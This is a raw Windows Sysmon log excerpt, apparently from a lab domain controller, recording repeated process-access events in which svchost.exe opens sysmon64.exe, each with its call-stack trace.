10:40:10.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001542Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001541Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001540Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001539Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001538Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001537Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001536Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001535Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001534Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001533Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001532Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001531Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001530Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001529Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001528Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001527Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001526Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001525Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.369{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001524Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.369{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001523Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.369{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001522Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.369{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001521Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.369{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001520Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.369{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001519Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 